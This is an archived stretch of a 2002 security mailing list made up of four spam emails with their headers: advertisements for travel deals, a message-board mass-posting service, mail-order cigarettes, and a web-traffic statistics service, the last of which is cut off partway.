smtp-server6.tampabay.rr.com (smtp-server6.tampabay.rr.com [65.32.1.43]) by gate.polarhome.com (8.11.6/8.11.6) with ESMTP id g61DAqF06394 for ; Mon, 1 Jul 2002 15:10:53 +0200 Received: from TM1 (9.198.33.65.cfl.rr.com [65.33.198.9]) by smtp-server6.tampabay.rr.com (8.12.2/8.12.2) with ESMTP id g61C6fmq022662 for ; Mon, 1 Jul 2002 09:10:50 -0400 (EDT) Message-Id: <200207011310.g61C6fmq022662@smtp-server6.tampabay.rr.com> From: sunpatel1234@hotmail.com To: security@polarhome.com Content-Type: text/html; Date: Mon, 1 Jul 2002 08:21:32 -0400 X-Priority: 3 X-Library: Indy 8.0.25 Subject: [Security] Monthly Mail Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.8 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive:
The following message was sent to you we are seeking your permission to send a single email monthly as an opt-in subscriber.  We will continue to bring you valuable offers on the products and services worldwide that interest you most. If you wish to unsubscribe please click here: Unsubscribe

Click Here to reserve your Grand Canyon Tour  

Cruise to the Caribbean! Click Here  

 Paris to Venice in your Pajamas. Sleeper trains from Rail Europe.

 HotelDiscounts.net-Save $25 on your next hotel stay!

 c2it (SM) by Citibank - transfer money online to over 120 countries! Fast, easy and secure. Guaranteed Exchange rate-Learn More!

  ZapTel - The Phone Card Superstore Call from country to country. UK's Rates are CHEAP at CallingCards.com Call from USA to any country

 

Thank you for your consideration Marketing Technologies 2000 Inc.  We never sell or trade email addresses.

Click here to opt out..


 
From crisha@trafficbbs.net Sun Jul 7 20:00:56 2002 Received: from TIANTANG160 ([211.101.236.160]) by gate.polarhome.com (8.11.6/8.11.6) with ESMTP id g67I0b630841 for ; Sun, 7 Jul 2002 20:00:51 +0200 Message-Id: <200207071800.g67I0b630841@gate.polarhome.com> From: "crisha@trafficbbs.net" To: security@polarhome.com Content-Type: multipart/alternative; boundary="=_NextPart_2rfkindysadvnqw3nerasdf"; MIME-Version: 1.0 Reply-To: "crisha@trafficbbs.net" Date: Mon, 8 Jul 2002 03:04:35 +0800 X-Priority: 3 X-Library: Business Promotion Subject: [Security] http://gate.polarhome.com/ Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.8 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: Discussion about security issues List-Unsubscribe: , List-Archive: This is a multi-part message in MIME format --=_NextPart_2rfkindysadvnqw3nerasdf Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Hello, You may have spent much on lots of ways to achieve=20these - search engine registrations, website=20promotions, press release, email sending?- Here=20Traffic BBS presents you a unique method economically=20and professionally converting a PC into personal=20message distribution center=21 Traffic BBS assists you=20to post your message or ad to over 1,200,000+ message=20boards on the web worldwide. Along with a hyperlink=20to your website or email address, a message of your=20business, product, service or offer will be promptly=20submitted to targeted bulletin boards. You can expect=20instant response=21=20 Get your business, service, product or offer seen=21=20 Best Regards, Crisha Wenston Sales & Marketing=20www.trafficbbs.net =20=20 --=_NextPart_2rfkindysadvnqw3nerasdf Content-Type: text/html Content-Transfer-Encoding: quoted-printable
Do you=20 want to get maximum exposure for your website?
Are you=20 trying to introduce or sell your new product?
Are you=20 planning to present your new service or technology?
Do you=20 want to learn instant info about new service?
Have you=20 got enough time, energy and cost to spread your idea?=20
 

Hello,

=20 You may have spent much on lots of ways to achieve these - search=20 engine registrations, website promotions, press release, and email=20 distribution=A1=AD Here TrafficBBS presents you a unique method=21 TrafficBBS economically and professionally converts=20 your PC into personal information distribution center by submitting=20 your website, business info, or products details to 50,000+ search=20 engines & 120,000+ boards on the web worldwide. Along with a hyperlink=20 to your email address or logo, your website will be promptly submitted=20 to categorized search engines and a message of your business & product=20 will be instantly presented on targeted bulletin boards. You can expect=20 immediate response=21=20





=20
  Visit the Following Links for More Details about TrafficBBS

http://www.trafficbbs.net -- An overview about TrafficBBS. You can visit different pages for detailed explanation.

http://www.trafficbbs.net/list.php -- This page contains two lists.=20 One is the sample list of our search engines & directories, and the=20 other is of message boards. Both of them show to which search engines &=20 BBS we will post your registered information. Currently there are data of=20 over 50,000 & 120,000 high traffic message boards in our database, which=20 is set up for international contacts. TrafficBBS technical development=20 team updates the data periodically to meet increasing requirements.

http://www.trafficbbs.net/faq.php -- Frequently Asked Questions from our=20 new and existing customers. You can read it first for possible help. It=20 gives details of our current service packages, explanation of various=20 function areas such as Bulk Order and Multiple Products, and introduction=20 about our other promotional tools, etc.

Get your business, service, product or offer seen=21=20

Best Regards,
Crisha Wenston
Sales & Marketing=20
www.trafficbbs.net=20

 
   
    Copy right©2001 ,=20 TrafficBBS&=238482;All Rights Reserved.
TrafficBBS&=238482;is a trademark of=20 TrafficBBS.Net inc.
--=_NextPart_2rfkindysadvnqw3nerasdf-- From smokesfromspain@terra.es Sat Sep 21 17:53:56 2002 Received: from linux.local ([213.9.245.200]) by redhat.polarhome.com (8.11.6/8.11.6) with SMTP id g8LFrs211955 for ; Sat, 21 Sep 2002 17:53:55 +0200 Message-Id: <200209211553.g8LFrs211955@redhat.polarhome.com> Received: (qmail 24050 invoked from network); 21 Sep 2002 13:39:13 -0000 Received: from unknown (HELO h) (192.168.0.2) by linux.local with SMTP; 21 Sep 2002 13:39:13 -0000 From: "Sales Department" To: security@polarhome.com Reply-To: smokesfromspain@terra.es Date: Sat, 21 Sep 2002 15:44:35 +0200 X-Priority: 3 X-Library: Indy 8.0.25 Subject: [Security] Low Price Fags Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.13 Precedence: bulk List-Unsubscribe: , List-Id: Discussion about security issues List-Post: List-Help: List-Subscribe: , List-Archive: Dear Sir or Madam In the past you have requested information on discounted products. We hope that you find this of interest. If you are not a smoker, and find this email offensive, we sincerely apologise! We will be only too happy to take you off our mailing list. If you are a smoker, however, and are fed up with paying high prices for your cigarettes and tobacco, take a look at what we have to offer by clicking on this link. http://www.smokersassociation.co.uk/?S=16&ID=2 We can send you, legally, by registered air mail, direct to your door, 4 cartons of cigarettes or 40 pouches of rolling tobacco (all brands are available) from only 170 Euros - about 105 pounds - fully inclusive of postage and packing. Why pay more? To remove yourself from our mailing list, please click below mailto:smokersclub@terra.es Yours faithfully. Smokers Association http://www.smokersassociation.co.uk/?S=16&ID=2 xay1979741y From sender@coolstats.com Sun Dec 22 01:33:06 2002 Received: from mail.actionbase.se ([212.247.15.209]) by redhat.polarhome.com (8.12.5/8.12.5) with ESMTP id gBM0Wqpp007432 for ; Sun, 22 Dec 2002 01:33:05 +0100 Received: from localhost.localdomain ([211.157.101.64]) by mail.actionbase.se (8.11.2/8.11.2) with ESMTP id gBLNO9k14816 for ; Sun, 22 Dec 2002 00:24:11 +0100 Received: from () by localhost.localdomain (8.11.6/8.11.6) with ESMTP id gBLNFIj04080 for ; Sun, 22 Dec 2002 07:15:38 +0800 Message-ID: <1059CR1000035970@p1j2m3a4.pdhost.com> Date: Sun, 22 Dec 2002 07:24:41 +0800 (CST) From: Jane Brooks Reply-To: Jane Brooks To: security@polarhome.com Mime-Version: 1.0 Content-Type: multipart/alternative; boundary=1051628246.1040513081578.JavaMail.SYSTEM.emaserver2 X-EMA-CID: 3785073 X-EMA-LID: X-EMA-PC: 0f22a54b25e00 Subject: [Security] www.polarhome.com Sender: security-admin@polarhome.com Errors-To: security-admin@polarhome.com X-BeenThere: security@polarhome.com X-Mailman-Version: 2.0.13 Precedence: bulk List-Unsubscribe: , List-Id: Discussion about security issues List-Post: List-Help: List-Subscribe: , List-Archive: --1051628246.1040513081578.JavaMail.SYSTEM.emaserver2 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit Hi, I thought you might be interested in getting in-depth knowledge about your web audience and web traffic patterns in a reliable and cost-effective way. Stop Guessing - Start Knowing! - CoolStats measures web site traffic and online behavior of your visitors. - CoolStats will help you understand how to optimize your site to meet the needs of your visitors. - You get access to detailed, real-time statistical analysis of your web pages - 24 hours a day. Click at http://www.coolstats.com/viewdemo/index.html to view Online Demo. - CoolStats is the ultimate real-time tracking solution for small and mid-sized businesses. - 100% accuracy by measuring activity at the client, not via server based log files. - The fee of $19.95 is minimal compared to what it would cost you to run a tracking service yourself! Why CoolStats? - no programming to do - no servers to maintain - no software applications to install Special Offer! Now Only $19.95/month (Usual Price/$29.95). Click at http://p1j2m3a4.pdhost.com/pdsvr/www/r?1000035970.1059.15.KLJ8asuNQOKLxP to Sign Up now! "We needed to make business sense out of our web visitor behavior - CoolStats delivers first-class graphical reports that help us continuously improve and optimize our website to match the requirements of our target audience." BRYAN KASHILIN, BOSTON Click at http://www.coolstats.com/product/customerref.html to check what other customers say about us! For more information about our website tracking services, please visit our website or contact me directly at the below email. I look forward to hearing from you soon. Best regards, Jane Brooks CoolStats Support Email: jane_brooks@coolstats.com http://www.coolstats.com Don't be the last one to know! ----------------------------------------------------------------------- This message has been brought to security@polarhome.com. If you do not wish to receive anymore emails, please follow the opt-out instruction below. We apologize for any inconvenience. http://p1j2m3a4.pdhost.com/pdsvr/www/r?1000035970.1059.3.X+JZ5pYAQ2a28C --1051628246.1040513081578.JavaMail.SYSTEM.emaserver2 Content-Type: text/html; charset=utf-8 Content-Transfer-Encoding: 7bit

Hi,

I thought you might be interested in getting in-depth knowledge about your web audience and web traffic patterns in a reliable and cost-effective way.